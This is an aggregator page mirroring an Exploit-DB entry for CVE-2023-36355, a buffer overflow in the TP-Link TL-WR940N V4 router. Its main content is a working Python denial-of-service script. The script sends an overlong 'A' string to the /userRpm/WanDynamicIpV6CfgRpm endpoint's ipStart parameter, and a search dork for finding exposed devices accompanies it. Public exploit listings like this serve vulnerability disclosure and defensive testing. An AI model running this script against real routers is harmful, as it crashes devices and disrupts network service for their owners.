6

[dos] TP-Link TL-WR940N V4 - Buffer OverFlow

 1 year ago
source link: https://www.exploit-db.com/exploits/51561
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

TP-Link TL-WR940N V4 - Buffer OverFlow

EDB-ID:

51561

EDB Verified:

Platform:

Hardware

Date:

2023-07-03

Vulnerable App:

# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow
# Date: 2023-06-30
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : hardware
# Dork : /userRpm/WanDynamicIpV6CfgRpm
# Tested on: Windows/Linux
# CVE : CVE-2023-36355

import requests

# Replace the IP address with the router's IP
router_ip = '192.168.0.1'

# Construct the URL with the vulnerable endpoint and parameter
url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='

# Replace the payload with a crafted payload that triggers the buffer overflow
payload = 'A' * 5000  # Example payload, adjust the length as needed

# Send the GET request with the crafted payload
response = requests.get(url + payload)

# Check the response status code
if response.status_code == 200:
    print('Buffer overflow triggered successfully')
else:
    print('Buffer overflow not triggered')

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK